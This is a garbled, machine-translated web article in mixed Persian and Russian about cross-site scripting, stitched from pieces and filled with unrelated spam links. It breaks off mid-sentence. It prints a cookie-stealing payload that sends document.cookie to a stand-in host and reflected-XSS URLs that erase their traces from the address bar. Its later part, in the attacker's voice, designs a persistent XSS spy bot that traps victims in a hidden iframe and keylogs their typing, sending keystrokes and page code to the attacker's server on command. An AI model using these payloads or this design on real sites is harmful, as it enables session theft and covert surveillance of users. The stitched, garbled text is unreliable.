خانه سوالات حملات XSS: چه هستند و چرا خطرناک هستند. آسیب پذیری XSS - چیست؟ نمونه هایی از آسیب پذیری های XSS تزریق Xss

حملات XSS: چه هستند و چرا خطرناک هستند. آسیب پذیری XSS - چیست؟ نمونه هایی از آسیب پذیری های XSS تزریق Xss

اسکریپت بین سایتی (به اختصار XSS) یک آسیب پذیری گسترده است که بر بسیاری از برنامه های کاربردی وب تأثیر می گذارد. به مهاجم اجازه تزریق می دهد کد مخرببه یک وب سایت به گونه ای که مرورگر کاربر بازدید کننده از سایت این کد را اجرا کند.

معمولاً برای بهره برداری از چنین آسیب پذیری، برخی از تعاملات با کاربر مورد نیاز است: یا کاربر با استفاده از سایت آلوده به سایت آلوده اغوا می شود. مهندسی اجتماعی، یا فقط صبر کنید تا از این سایت بازدید کند. بنابراین، توسعه دهندگان اغلب آسیب پذیری های XSS را جدی نمی گیرند.

اما اگر آنها حذف نشوند، این می تواند یک خطر امنیتی جدی ایجاد کند.

تصور کنید که در پنل مدیریت وردپرس هستیم، اضافه می کنیم محتوای جدید. اگر برای انجام این کار از یک افزونه آسیب پذیر XSS استفاده کنیم، می تواند مرورگر را مجبور به ایجاد یک مدیر جدید، اصلاح محتوا و انجام سایر اقدامات مخرب کند. اسکریپت بین سایتی به مهاجم کنترل تقریباً کاملی بر مهمترین آنها می دهد نرم افزاراین روزها یک مرورگر است.

XSS: آسیب پذیری تزریق

هر وب‌سایت یا برنامه‌ای دارای چندین نقطه ورود داده است - فیلدهای تا خود URL را تشکیل می‌دهند. ساده ترین مثال ورودی زمانی است که یک نام کاربری و رمز عبور را در یک فرم وارد می کنیم:

نام ما در پایگاه داده سایت برای تعامل بعدی با ما ذخیره خواهد شد. حتما وقتی در هر سایتی مجوز داشتید، احوالپرسی شخصی به سبک «ایلیا» خوش آمدید دیدید.

برای چنین اهدافی است که نام های کاربری در پایگاه داده ذخیره می شوند.

تزریق روشی است که در آن دنباله خاصی از کاراکترها به جای نام یا رمز عبور وارد می شود و سرور یا مرورگر را مجبور می کند تا به روش خاصی که مهاجم نیاز دارد پاسخ دهد.

اسکریپت بین سایتی تزریقی است که کدی را تزریق می کند که اقداماتی را در مرورگر از طرف یک وب سایت انجام می دهد. این می تواند هم با اعلان کاربر و هم در پس زمینه بدون اطلاع او اتفاق بیفتد.

حملات XSS سنتی:

منعکس شده (غیر دائمی).

یک حمله XSS منعکس شده زمانی آغاز می شود که کاربر بر روی یک پیوند ساخته شده ویژه کلیک کند.

این آسیب‌پذیری‌ها زمانی رخ می‌دهند که داده‌های ارائه شده توسط یک سرویس گیرنده وب، معمولاً در پارامترهای درخواست HTTP یا فرم HTML، مستقیماً توسط اسکریپت های سمت سرور برای تجزیه و نمایش صفحه نتایج برای آن مشتری، بدون پردازش مناسب اجرا می شوند.

ذخیره شده (دائمی).

XSS ذخیره شده زمانی امکان پذیر است که یک مهاجم موفق شود کد مخرب را به سروری تزریق کند که هر بار که به صفحه اصلی دسترسی پیدا می کند در مرورگر اجرا می شود. یک مثال کلاسیک از این آسیب‌پذیری، انجمن‌هایی هستند که اجازه نظرات را در قالب HTML می‌دهند.

آسیب پذیری های ناشی از کد سمت سرویس گیرنده (جاوا اسکریپت، ویژوال بیسیک، فلش و غیره):

همچنین به عنوان مدل های DOM شناخته می شود:

منعکس شده (غیر دائمی).

همانطور که در مورد سمت سرور، تنها در این مورد امکان حمله به دلیل پردازش کد توسط مرورگر وجود دارد.

ذخیره شده (دائمی).

مشابه XSS ذخیره شده در سمت سرور، فقط در این مورد، مؤلفه مخرب در سمت سرویس گیرنده با استفاده از ذخیره سازی مرورگر ذخیره می شود.

نمونه هایی از آسیب پذیری های XSS.

جالب اینجاست که در بیشتر مواردی که این آسیب‌پذیری توضیح داده می‌شود، با کد زیر می‌ترسیم:

http://www.site.com/page.php?var=

دو نوع آسیب پذیری XSS وجود دارد - غیرفعال و فعال.

آسیب پذیری فعالخطرناک تر، از آنجایی که مهاجم نیازی به فریب قربانی از طریق یک پیوند خاص ندارد، او فقط باید کد را به پایگاه داده یا برخی از فایل ها در سرور تزریق کند. بنابراین، تمام بازدیدکنندگان سایت به طور خودکار قربانی می شوند. می توان آن را به عنوان مثال با استفاده از تزریق SQL (تزریق SQL) ادغام کرد. بنابراین، شما نباید به داده های ذخیره شده در پایگاه داده اعتماد کنید، حتی اگر در هنگام درج پردازش شده باشند.

مثال آسیب پذیری غیرفعالرا می توان در همان ابتدای مقاله یافت. مهندسی اجتماعی قبلاً در اینجا مورد نیاز است، به عنوان مثال، نامه مهمی از مدیریت سایت با درخواست برای بررسی تنظیمات حساب خود پس از بازیابی از یک نسخه پشتیبان. بر این اساس، شما باید آدرس قربانی را بدانید یا فقط یک لیست پستی هرزنامه یا پست در برخی از انجمن ها ترتیب دهید، و حتی این واقعیت نیست که قربانیان ساده لوح باشند و پیوند شما را دنبال کنند.

علاوه بر این، هر دو پارامتر POST و GET می توانند در معرض آسیب پذیری غیرفعال باشند. البته با پارامترهای POST باید به سراغ ترفندها بروید. به عنوان مثال، تغییر مسیر از سایت مهاجم.

بنابراین، آسیب‌پذیری GET کمی خطرناک‌تر است، زیرا تشخیص دامنه اشتباه برای قربانی آسان تر از آن است پارامتر اضافی(اگرچه url را می توان اصلاً رمزگذاری کرد).

دزدیدن کوکی ها

این متداول ترین مثال از حمله XSS است. سایت‌ها گاهی اوقات برخی از اطلاعات ارزشمند را در کوکی‌ها ذخیره می‌کنند (گاهی اوقات حتی لاگین و رمز عبور کاربر (یا هش آن)، اما خطرناک‌ترین آنها سرقت جلسه فعال است، بنابراین فراموش نکنید که روی پیوند "خروج" در سایت‌ها کلیک کنید، حتی اگر باشد کامپیوتر خانگی. خوشبختانه، در اکثر منابع، طول عمر جلسه محدود است.

Varimg = New Image(); img.src = "http://site/xss.php؟" +document.cookie;

بنابراین، ما محدودیت های دامنه را در XMLHttpRequest معرفی کردیم، اما این برای یک مهاجم ترسناک نیست، زیرا وجود دارد , <img>, <script>, background:url(); и т.п.</p> <h3>Кража данных из форм</h3> <p>Ищем форму через, например, getElementById и отслеживаем событие onsubmit. Теперь, перед отправкой формы, введенные данные отправляются также и на сервер злоумышленника.</p> <p>Этот тип атаки чем-то напоминает фишинг, только используется не поддельный сайт, а реальный, чем вызывается большее доверие жертвы.</p> <h3>DDoS-атака (распределенная атака типа «отказ в обслуживании»)</h3> <p>XSS-уязвимость на многопосещаемых ресурсах может быть использована для проведения DDoS-атаки. Суть проста - много запросов, которые не выдерживает атакуемый сервер.<br> Собственно отношение к XSS имеет косвенное, поскольку скрипты могут и не использоваться вовсе, достаточно конструкции вида:</p><p> <img src='https://i0.wp.com/site.com/' loading=lazy loading=lazy> </p><h2>В чем опасность XSS?</h2> <p>Как можно защитить свой сайт от XSS? Как проверить код на наличие уязвимости? Существуют технологии вроде Sucuri Firewall, специально разработанные для того, чтобы избежать подобных атак. Но если вы разработчик, вы, безусловно, захотите узнать подробнее, как идентифицировать и устранить XSS-уязвимости.</p> <p>Об этом мы поговорим в следующей части статьи, посвященной XSS.</p> <p>Что такое XSS-уязвимость? Стоит ли ее опасаться?</p> <p>Межсайтовый скриптинг (сокращенно XSS) - широко распространенная уязвимость, затрагивающая множество веб-приложений. Она позволяет злоумышленнику внедрить вредоносный код в веб-сайт таким образом, что браузер пользователя, зашедшего на сайт, выполнит этот код.</p> <p>Обычно для эксплуатации подобной уязвимости требуется определенное взаимодействие с пользователем: либо его заманивают на зараженный сайт при помощи социальной инженерии, либо просто ждут, пока тот сам посетит данный сайт. Поэтому разработчики часто не воспринимают всерьез XSS-уязвимости. Но если их не устранять, это может нести серьезную угрозу безопасности.</p> <p>Представим, что мы находимся в панели администратора WordPress, добавляем новый контент. Если мы используем для этого уязвимый к XSS плагин, он может заставить браузер создать нового администратора, видоизменить контент и выполнить другие вредоносные действия.</p> <p>Межсайтовый скриптинг предоставляет злоумышленнику практически полный контроль над самым важным программным обеспечением в наши дни - браузером.</p> <h2> XSS: Уязвимость для инъекции</h2> <p>Любой веб-сайт или приложение имеет несколько мест ввода данных -полей формы до самого URL. Простейший пример вводимых данных - когда мы вписываем имя пользователя и пароль в форму:</p> <p><b>Рисунок 1. Форма ввода данных </b></p> <p>Наше имя будет храниться в базе данных сайта для последующего взаимодействия с нами. Наверняка, когда вы проходили авторизацию на каком-либо сайте, вы видели персональное приветствие в стиле «Добро пожаловать, Илья». Именно для таких целей имена пользователей хранятся в базе данных.</p> <p>Инъекцией называется процедура, когда вместо имени или пароля вводится специальная последовательность символов, заставляющая сервер или браузер отреагировать определенным, нужным злоумышленнику образом.</p> <p>Межсайтовым скриптингом называется инъекция, внедряющая код, который будет выполнять действия в браузере от имени веб-сайта. Это может происходить как с уведомлением пользователя, так и в фоновом режиме, без его ведома.</p> <p><b>Рисунок 2. Наглядная схема межсайтового скриптинга </b></p> <p><img src='https://i0.wp.com/anti-malware.ru/files/xss-example-flow-diagram1.png' width="100%" loading=lazy loading=lazy></p> <p>В качестве простейшего примера можно привести элементарный скрипт, показывающий окно с уведомлением. Выглядит он примерно так:</p> <p><b>Таблица 1. Скрипт, вызывающий всплывающее окно </b></p> <p><script>alert(" ЭТО <span>XSS- </span>УЯЗВИМОСТЬ !!!")</script> </p> <p>این اسکریپت پنجره ای با کتیبه "THIS IS XSS VULNERABILITY!!!" فراخوانی می کند. مرورگر کاربر این اسکریپت را به عنوان بخشی از کد قانونی سایت می پذیرد و اجرا می کند.</p> <h2>انواع آسیب پذیری های XSS</h2> <p>همه آسیب‌پذیری‌های XSS یکسان نیستند، انواع مختلفی دارند. در اینجا انواع و نحوه تعامل آنها آمده است:</p> <p><b>شکل 3. انواع آسیب پذیری های XSS</b></p> <p><b><br><img src='https://i2.wp.com/anti-malware.ru/files/sucuri-blog-xss-types.png' width="100%" loading=lazy loading=lazy></b></p> <p><b>آسیب پذیری های ناشی از کد سمت سرور (جاوا، پی اچ پی، دات نت و غیره):</b></p> <p>حملات XSS سنتی:</p> <ol><li>منعکس شده (غیر دائمی). یک حمله XSS منعکس شده زمانی آغاز می شود که کاربر بر روی یک پیوند ساخته شده ویژه کلیک کند. این آسیب‌پذیری‌ها زمانی رخ می‌دهند که داده‌های ارائه‌شده توسط یک سرویس گیرنده وب، معمولاً در پارامترهای درخواست HTTP یا به شکل HTML، مستقیماً توسط اسکریپت‌های سمت سرور برای تجزیه و نمایش صفحه نتایج برای آن مشتری، بدون پردازش مناسب، اجرا می‌شوند.</li> <li>ذخیره شده (دائمی). XSS ذخیره شده زمانی امکان پذیر است که یک مهاجم موفق شود کد مخرب را به سروری تزریق کند که هر بار که به صفحه اصلی دسترسی پیدا می کند در مرورگر اجرا می شود. یک مثال کلاسیک از این آسیب‌پذیری، انجمن‌هایی هستند که اجازه نظرات را در قالب HTML می‌دهند.</li> </ol><p><b>آسیب پذیری های ناشی از کد سمت سرویس گیرنده (جاوا اسکریپت، <a href="https://bar812.ru/fa/ishodnye-kody-na-small-basic-yazyk-visual-basic-primery-napisaniya-koda-zapusk.html">ویژوال بیسیک</a>، فلش و غیره):</b></p> <p>همچنین به عنوان مدل های DOM شناخته می شود:</p> <ol><li>منعکس شده (غیر دائمی). همانطور که در مورد سمت سرور، تنها در این مورد امکان حمله به دلیل پردازش کد توسط مرورگر وجود دارد.</li> <li>ذخیره شده (دائمی). مشابه XSS ذخیره شده در سمت سرور، فقط در این مورد، مؤلفه مخرب در سمت سرویس گیرنده با استفاده از ذخیره سازی مرورگر ذخیره می شود.</li> </ol><p><b>آسیب‌پذیری‌های ناشی از زیرساخت (مرورگر، افزونه‌ها، سرورها و غیره):</b></p> <p>آنها بسیار نادر هستند، اما خطرناک تر هستند:</p> <ol><li>زیرساخت در سمت مشتری زمانی اتفاق می‌افتد که یک مؤلفه مخرب هر گونه دستکاری در عملکرد مرورگر انجام دهد، به عنوان مثال، با فیلتر XSS و غیره.</li> <li>زیرساخت سمت سرور زمانی رخ می دهد که وب سرور درخواست ها را به درستی پردازش نمی کند و اجازه می دهد آنها را تغییر دهید.</li> <li>خالص. زمانی رخ می دهد که امکان نفوذ در ارتباط بین کلاینت و سرور وجود داشته باشد.</li> </ol><p><b>آسیب پذیری های ایجاد شده توسط کاربر:</b></p> <ol><li>خود XSS. اغلب در نتیجه مهندسی اجتماعی اتفاق می افتد، زمانی که کاربر به طور تصادفی کدهای مخرب را در مرورگر خود اجرا می کند.</li> </ol><h2>خطر XSS چیست؟</h2> <p>چگونه می توانید از سایت خود در برابر XSS محافظت کنید؟ چگونه کد آسیب پذیری را بررسی کنیم؟ فناوری هایی مانند فایروال Sucuri وجود دارند که به طور خاص برای جلوگیری از چنین حملاتی طراحی شده اند. اما اگر توسعه‌دهنده هستید، قطعاً می‌خواهید درباره نحوه شناسایی و رفع آسیب‌پذیری‌های XSS اطلاعات بیشتری کسب کنید. در قسمت بعدی مقاله اختصاص داده شده به XSS در این مورد صحبت خواهیم کرد.</p> <p>همه مدت‌هاست می‌دانند که اغلب با استفاده از XSS، مهاجم سعی می‌کند کوکی قربانی را ارسال کند، نشانه‌های CSRF را بخواند، یک حمله فیشینگ (با ایجاد یک فرم ورود جعلی) انجام دهد، برخی از اقدامات را از طرف کاربر انجام دهد، و برخی دیگر. حملات مشابه (شاید این همه احتمالات نباشد، اما همه اینها محبوب‌ترین حملاتی هستند که من در <a href="https://bar812.ru/fa/podrobnyi-obzor-i-testirovanie-apple-iphone-se-apple-iphone-se-2017-dizain.html">این لحظه</a>).</p> <p>هدف از این روش نظارت بر صفحاتی است که از طرف کاربر در سایت مورد حمله قرار می گیرد و همچنین نظارت بر ضربه های کلید او (همچنین می توانید ماوس را حرکت دهید و کلیک کنید، اما برای من این کار اضافی است، نه خیلی زیاد). اطلاعات مفید، در اکثر موارد مطمئنا) . <br>اکنون در مورد حداکثر سود - من معتقدم که الگوریتم به این صورت خواهد بود:</p> <ul><li>خواندن و ارسال کوکی ها؛</li> <li>خواندن و ارسال بقیه اطلاعات (آدرس IP، <a href="https://bar812.ru/fa/plagin-clr-browser-kak-skachat-i-ustanovit-plagin-dlya-open-broadcaster-software-obs.html">پلاگین های نصب شده</a>، نسخه و نوع مرورگر، پشتیبانی از فلش، پشتیبانی از silverlight و غیره) [اختیاری]</li> <li>ما اطلاعاتی در مورد شبکه داخلی به دست می آوریم، از روتر عبور می کنیم [اختیاری]</li> <li>خواندن و ارسال نشانه های مختلف [اختیاری]؛</li> <li>پیاده سازی فیشینگ [اختیاری]؛</li> <li>انجام کاری با "دست" کاربر [اختیاری].</li> <li>ما به جاسوسی از او و دریافت اطلاعات تا زمانی که برگه را ببندد یا سایت را ترک کند، ادامه می دهیم.</li> </ul><p>تمام موارد لیست اختیاری IMHO باید بسته به موقعیت و اولویت های خاص برای اهدافی که باید با استفاده از XSS به دست آیند، انجام شوند، آنها گاهی اوقات می توانند با یکدیگر تداخل داشته باشند (اگر سعی کنید آنها را ترکیب کنید، به طور دقیق تر، یکی پس از دیگری انجام دهید) و افزایش دهید. احتمال شکست XSS. <br>اما اینجا اولین است <a href="https://bar812.ru/fa/skolko-stoit-akkaunt-razrabotchika-google-play-kak-dobavlyat-igry-v-google-play.html">پاراگراف آخر</a>در هر صورت باید همیشه این کار را انجام دهید، در واقع قسمت اصلی مقاله در مورد آخرین مورد از این لیست خواهد بود.</p> <h3><u><b>به هدف نزدیک می شویم.</b> </u></h3> <p>از دور شروع می کنم: از طریق جاوا اسکریپت می توان مسیر را تغییر داد <a href="https://bar812.ru/fa/prilozhenie-zhesty-dlya-android-wristwhirl-prototip-umnyh-chasov-upravlyaemyh-zhestami-gorizontalnye.html">نوار آدرس</a>بدون بارگذاری مجدد صفحه به عنوان مثال، اگر کاربر یک صفحه را بارگذاری کند</p> <br>سپس در نوار آدرس، محتوا به شکل زیر در می‌آید (بدون بارگیری مجدد صفحه): <table class="crayon-table"><tr class="crayon-row"><td class="crayon-nums " data-settings="show"> </td> <td class="crayon-code"><p>http://site.com/new-url/</p> </td> </tr></table><br>این ویژگی، به هر حال، گاهی اوقات بسیار مفید است زمانی که شما نیاز دارید که از کاربران (یا یک دسته دقیق تر از کاربران - مدیران) مخفی شوید تا پس از کلیک روی پیوندی که حاوی XSS منعکس شده است، به سرعت URL را پاک کنید، به طوری که او بعدا ، پس از بارگذاری صفحه، با جستجو در نوار آدرس، چیزی پیدا نشد. <table class="crayon-table"><tr class="crayon-row"><td class="crayon-nums " data-settings="show"> </td> <td class="crayon-code"><p>http : <span>//site.com/search.php?q=123<script> document . body . innerHTML += "Hacked" ; </script> </p> </td> </tr></table> <table class="crayon-table"><tr class="crayon-row"><td class="crayon-nums " data-settings="show"> </td> <td class="crayon-code"><p>http : <span>//site.com/search.php?q=123<script> window . history . pushState ("" , "" , "/" ) ; document . body . innerHTML += "Hacked" ; </script> </p> </td> </tr></table><br>این فرصت را از او سلب خواهیم کرد. <p>اما این تکنیک کاربرد جالب و قدرتمندتری دارد. ما اقامت کاربر در سایت را پس از کلیک بر روی لینک تقلید می کنیم، در واقع او همیشه در همان صفحه باقی می ماند و در این زمان یک اسکریپت شخص ثالث کار می کند و اطلاعات را استخراج و برای مهاجم ارسال می کند. به این ترتیب، <b><u>تا زمانی که کاربر پیوند این دامنه را دنبال کند، XSS کار خواهد کرد</u> </b>.</p> <h3><u><b>بیایید یک ایده را تعریف کنیم.</b> </u></h3> <p>اصل کلی کار به این صورت است: وقتی کاربر وارد صفحه ای با XSS می شود، اسکریپت یک iframe با همان آدرس این صفحه ایجاد می کند و آن را به پیش زمینه "ضمیمه" می کند، کاربر این تصور را دریافت می کند که صفحه به طور معمول بارگذاری شده است، زیرا iframe فقط در صفحات کد قابل مشاهده است.</p> <p>و اسکریپت کمکی منطق ربات جاسوسی را کنترل می کند، یعنی زمانی که آدرس در فریم تغییر می کند نظارت می کند تا آن را در نوار آدرس تغییر دهد، اگر دامنه دیگری در آدرس تازه تغییر یافته فریم وجود داشته باشد، شما می توانید آن را در یک برگه جدید باز کنید، یا باید صفحه را دوباره بارگیری کنید تا به خواب نروید. <br>بنابراین، برای اینکه XSS در حال حاضر اجرا را متوقف کند، کاربر باید صفحه را به صورت دستی بازخوانی کند (اگر XSS منعکس شده باشد و ارسال شده باشد. <a href="https://bar812.ru/fa/rodstvennye-svyazi-muzh-zhena-test-t-shcha-sv-kor-svekrov-dever.html">روش POST</a>، در موارد دیگر، به روز رسانی ذخیره نمی شود و اتفاقاً برخی از مرورگرها در حال حاضر هنگام به روز رسانی صفحه می توانند دوباره درخواست POST ارسال کنند یا برگه را ببندند یا به دامنه دیگری بروند (البته در این صورت می توانید هنوز از دست دادن کنترل خودداری کنید).</p> <p>اگر به زیر دامنه دامنه مورد حمله برود، انتخاب مهاجم یعنی XSS کار می کند، اما احتمال کمی وجود دارد که کاربر عدم تطابق بین آدرس را ببیند. من فکر می کنم بستگی به شرایط دارد، به عنوان مثال، اگر دامنه google.ru مورد حمله قرار گرفته باشد، کاربر به سرویس فایل ابری Google که معمولاً در زیر دامنه drive.google.ru قرار دارد سوئیچ کند، سپس احتمال اینکه متوجه شود وقتی به نوار آدرس نگاه می‌کنید، یک امتیاز بسیار زیاد است، <u>اگر او اغلب از این سرویس استفاده می کرد</u>. در غیر این صورت می توانید ریسک کنید. اما باید در نظر داشته باشیم که دیگر نمی‌توانیم داده‌های آن را از فریمی با یک زیر دامنه بخوانیم، زیرا خط‌مشی Cross Origin این اجازه را نمی‌دهد. اما ما می توانیم با خیال راحت از طرف آن در حالت مخفی از دامنه اصلی صعود کنیم (در زیر با جزئیات بیشتر در مورد این موضوع صحبت خواهم کرد).</p> <p>فقط این روش دارای محدودیت هایی است، یعنی اگر پاسخ های وب سرور سایت حاوی هدر باشد، کار نخواهد کرد <b>X-Frame-Options</b>با معنی <b>انکار</b>. اما من شخصاً فقط چند بار با چنین سایت هایی ملاقات کردم ، اکنون حتی نیمی از آنها <b>SAMEORIGIN</b>به نمایش گذاشته نشده است، به ذکر محدودیت کامل از طریق <i>انکار</i>.</p> <h3><u><b>ما ایده را تحلیل می کنیم.</b> </u></h3> <p>اکنون بسیاری از مردم احتمالاً چیز شگفت انگیزی مانند BeEF را به یاد آورده اند که چیزهای جالب زیادی نیز دارد. بنابراین، به هر حال، گزینه ای برای تغییر مسیر اجباری کاربر در قاب نیز وجود دارد، اما آدرس در نوار آدرس تغییر نمی کند، که می تواند به سرعت میز را بسوزاند و این گزینه اهداف کمی متفاوت دارد. <br>به طور کلی، BeEF تقریباً همه چیزهایی را که نیاز دارید و حتی مقدار زیادی دارد <a href="https://bar812.ru/fa/dopolnitelnyi-vneshnii-akkumulyator-dlya-smartfona-portativnyi.html">ویژگی های اضافی</a>، اما من شخصاً عملکرد اضافی را می خواستم، یعنی:</p> <ul><li>توانایی نظارت بر کد صفحاتی که در زمان واقعی در دسترس کاربر مورد حمله قرار می گیرند.</li> <li>توانایی تماشای همه چیزهایی که او در آن سایت تایپ می کند (از ورود و رمز عبور گرفته تا کلیدهای فوری و پیام ها)، یعنی کی لاگر در JS.</li> <li>امکان دادن دستورات JS به ربات خود در زمان واقعی، پس از مشاهده کد صفحات دریافتی.</li> <li>توانایی واگذاری دستورات به ربات به صورت محلی، به طوری که او سپس آنها را "برمی‌دارد" و بدون مشارکت مستقیم ما آنها را اجرا می‌کند.</li> <li>احتمال کمتر خوابیدن یک ربات، یا توانایی یک ربات برای "پنهان شدن" از چشمان کنجکاو؛</li> </ul><p>همانطور که در بالا ذکر شد، تصمیم گرفتم ایده جالب صف اجرای دستور را از BeEF قرض بگیرم. به عنوان مثال، ما صفحاتی را که ربات هنگام ورود کاربر ممتاز به کنترل پنل خود با XSS ذخیره شده، پرتاب کرد، تجزیه و تحلیل کردیم، دستورات را به ربات واگذار کردیم - کد JS، مانند دفعه بعد که کاربر وارد شد، روی این دکمه کلیک کنید، بنویسید. پایین آمدن چنین مقداری در اینجا و غیره، وقتی این کاربر بعدی از صفحه بازدید می کند، ربات دستورات را می خواند و آنها را اجرا می کند، و ما مجبور نیستیم برای همه چیز در راس او باشیم - این بسیار راحت است.</p> <p>اساساً، چنین رباتی، البته، برای کاربران وضعیت برخی از سایت‌ها که دارای «اهرم‌های» اضافی برای مدیریت محتوا، سایر کاربران و غیره هستند، طراحی شده است. از درخواست های کاربردی می توان دریافت که بخش سرور ضروری است.</p> <h3><u><b>بیایید ایده را اجرا کنیم.</b> </u></h3> <p>در اصل، این بخش از مقاله را می توان نادیده گرفت، زیرا به سادگی فرآیند پیاده سازی ربات مورد نظر و برخی از جزئیات آن را توضیح می دهد، در صورتی که کسی بخواهد آن را بازسازی کند یا برای خود تمام کند. اگرچه ربات در ابتدای کد دارای متغیرهایی خواهد بود که از طریق آنها می توانید برخی تنظیمات را انجام دهید. <br>ابتدا الگوریتم اقدامات ربات از لحظه بارگذاری:</p> <p>1) بررسی وجود هدر <i>X-Frame-Options:DENY</i>(در صورت وجود، میله های ماهیگیری را جمع می کنیم). <br>2) تعبیه یک فریم و راه اندازی تمام اجزای ربات. <br>3) حذف اسکریپت و تمام آثار در کد HTML. <br>4) برقراری ارتباط با قسمت شمالی و شروع ارسال اطلاعات، واکنش به پاسخ ها (دریافت دستورات از سرور).</p> <p>نکته اول به طور کامل بیان نشده است، یعنی ربات فقط صفحه اول و هدر ریشه را بررسی می کند. واقعیت این است که معمولاً این هدرها توسط وب سرور برای همه صفحات به طور همزمان تعبیه می شوند و به ندرت همه چیز به صورت "دستی" برای یک صفحه جداگانه انجام می شود. بله، و این عنوان به خودی خود بسیار نادر است. خوب، در مورد دوم و سوم چیز خاصی برای گفتن وجود ندارد، همه چیز در زیر خواهد بود.</p> <p>نسبتا وجود دارد <a href="https://bar812.ru/fa/ekstra-tv-pakety-s-1-oktyabrya-oborudovanie-dlya-cifrovogo-televideniya---eto-to-chto-mozhno-kupit-v-nash.html">نکته مهم</a>قبل از افزودن کد اسکریپت ربات در کد خود، باید فوراً از شر علائم XSS در نوار آدرس (از کد JS) خلاص شوید، زیرا این امر شانس شناسایی را کاهش می دهد و مهمتر از همه، از بازگشتی که در زمان رخ می دهد جلوگیری می کند. افزودن آدرسی با همان XSS به کد فریم که به نوبه خود یک فریم دیگر با خود ایجاد می کند و غیره.</p> <p>اما در هر صورت، کد ربات توانایی شناسایی چنین بازگشتی فریم و جلوگیری از آن را در اولین تلاش برای اضافه کردن یک فریم به فریمی که قبلا ایجاد شده است را اجرا می کند، اما بهتر است فقط به آن تکیه نکنید، بلکه علاوه بر این، کد را قبل از آن حذف کنید. در حال بارگذاری کد ربات هرچند هنوز با مشکلی مواجه نشدم.</p> <p>عملکرد بررسی به روز رسانی قاب. من چندین راه را برای حل اقتصادی این مشکل با آویزان کردن گردانندگان رویداد امتحان کردم <i>پنجره محتوا</i>یا <i>محتوای سند</i>، اما هیچ کار نکرد، بنابراین من مجبور شدم تابعی بنویسم که آدرس فریم را بررسی کند و آن را با آنچه قبلاً ذخیره شده مقایسه کند و بر اساس آن تصمیم بگیرد که آیا فریم به روز شده است (آیا آدرس تغییر کرده است) و سپس خودش را فراخوانی کند. به صورت بازگشتی <br><br>فرکانس چنین بررسی هایی در هر ثانیه توسط متغیر کنترل می شود <i>تاخیر انداختن</i>، که در ابتدای فایل کد ربات مشخص شده است. اما بعداً، با نوشتن آن، راه حل کارآمدتری پیدا کردم - از یک راه حل ساده استفاده کنید و آویزان کنید <i>در حال بارگذاری</i>روی قاب، بنابراین من آن عملکرد را ترک کردم، اما در صورتی که بعداً محبوب‌تر شود، آن را توضیح دادم.</p> <h3><u><b>ارسال کد HTML صفحه.</b> </u></h3> <p>در اینجا طرح بسیار ساده است - پس از هر بار بارگذاری مجدد قاب (شامل بار اول)، ربات کل کد HTML صفحه را به همراه آدرس فعلی خود به سرور ارسال می کند تا بعداً تشخیص داده شود که آیا کد متعلق به آن است یا خیر. به صفحات مورد نظر</p> <p>سرور منطق ذخیره صفحات را پیاده سازی می کند - سرور برای هر دامنه یک پوشه با نام این دامنه ایجاد می کند و تمام داده ها را در آنجا ذخیره می کند. کدهای صفحه ذخیره می شوند و دائماً به روز می شوند <a href="https://bar812.ru/fa/skachat-eksplorer-10-russkaya-versiya-obnovlyaem-brauzer-internet-explorer-do.html">نسخه های فعلی</a>، اما در عین حال هر روز یک کپی جدید از صفحه ایجاد می شود تا در صورت لزوم بتوانید تاریخچه نسخه را کنترل کنید. یعنی برای <i>/news.php</i>در 1 سپتامبر، ایالت به روز می شود، و در 2 سپتامبر، یک کپی از آن ایجاد می شود، فقط مربوط به آن روز، و به همین ترتیب دوباره هر روز (اگر کاربر هر روز از این صفحه بازدید کند). نام صفحه شامل تاریخ و مسیر این صفحه نسبت به ریشه سایت (یعنی بدون دامنه) است.</p> <h3><u><b>Keylogger در جاوا اسکریپت.</b> </u></h3> <p>این ایده قبلاً توسط برخی از علاقه مندان اجرا شده است ، اما برای من پیشرفت های آنها مناسب نبود ، اگر فقط به این دلیل که اکثر آنها کاملاً ساده بودند ، یعنی رمز کلید فشرده شده را تشخیص دادند و از طریق آن <i>String.fromCharCode</i>به نمادها ترجمه شده است. اما این روش دارای تعدادی معایب است - کلیدهای کنترلی مانند shift، کنترل، فاصله و غیره به هیچ شکلی ترجمه نمی شوند (اغلب فقط به یک کاراکتر خالی)، تعامل کلیدهای الفبایی عددی با shift به اشتباه ثبت می شود، زیرا این باید به صورت برنامه نویسی اجرا شود و همچنین تمام کلیدهای فشرده در نمایش داده می شوند <a href="https://bar812.ru/fa/sql-like-opisanie-operatory-like-i-not-like-preobrazuem-znacheniya-v.html">حروف بزرگ</a>، که به صورت برنامه ای نیز قابل اصلاح است.</p> <p>در نتیجه، یک کی لاگر دریافت کردیم که تمام کلیدهای اعداد، حروف و کاراکترهای اصلی را به درستی تشخیص می داد، روی هر دو طرح بندی کار می کرد، به تغییر واکنش نشان می داد و همه کلیدهای ویژه اصلی را ثبت می کرد. درست است، برخی از علائم (در بالا <a href="https://bar812.ru/fa/cifrovoi-dvoinik-ili-kiber-fizicheskaya-sistema-era-transformerov.html">سری دیجیتال</a>، که با فشار دادن شیفت و شماره چاپ می شوند)، ممکن است در برخی از ماشین ها متفاوت باشد، زیرا طبق استاندارد اصلی که برخی از شرکت ها آن را تغییر می دهند، پیاده سازی شده اند. <br>هر قسمت از کاراکترهای فشرده شده توسط مشتری حفظ می شود تا زمانی که عنصر متن فوکوس خود را از دست بدهد. سپس این بخش به سرور ارسال می شود و در آنجا ذخیره می شود <a href="https://bar812.ru/fa/vvod-dannyh-iz-faila-i-vyvod-v-fail-rabota-s-tekstovymi-failami-c.html">فایل متنی</a>که همچنین هر روز با یک کپی جدید ایجاد می شود تا رشدی به اندازه های بزرگ نداشته باشید و بتوانید به سرعت آنچه را که کاربر در چنین زمانی تایپ می کرد پیدا کنید. <br>علاوه بر خود کلیدها، اطلاعات مربوط به عنصری که متن در آن تایپ شده است با هر قسمت به سرور ارسال می شود (یعنی اینکه آیا <i><input>, <textarea>[ </i>یا برخی <i><body> </i>هنگامی که کاربر از کلیدهای میانبر استفاده می کند، علاوه بر نام عنصر، داده های اصلی آن (id، نام، کلاس - در صورت وجود) ارسال می شود تا به راحتی بتوان آن را در کد پیدا کرد. و البته آدرس صفحه ای که ست روی آن تنظیم شده و زمان تقریبی این مجموعه ثبت می شود. AT <a href="https://bar812.ru/fa/kak-ochistit-kesh-servera-1s-predpriyatie-8-3-obshchaya-informaciya-chto-takoe-kesh-i.html">اطلاعات کلی</a>در مورد ضربه زدن کاربر به صفحه کلید، به اندازه کافی برای تجزیه و تحلیل بعدی آن ارسال می شود.</p> <h3><u><b>به ربات خود فرمان دهید</b> </u></h3> <p>این فرآیند می تواند توسط یک مهاجم یا در سمتی که قسمت 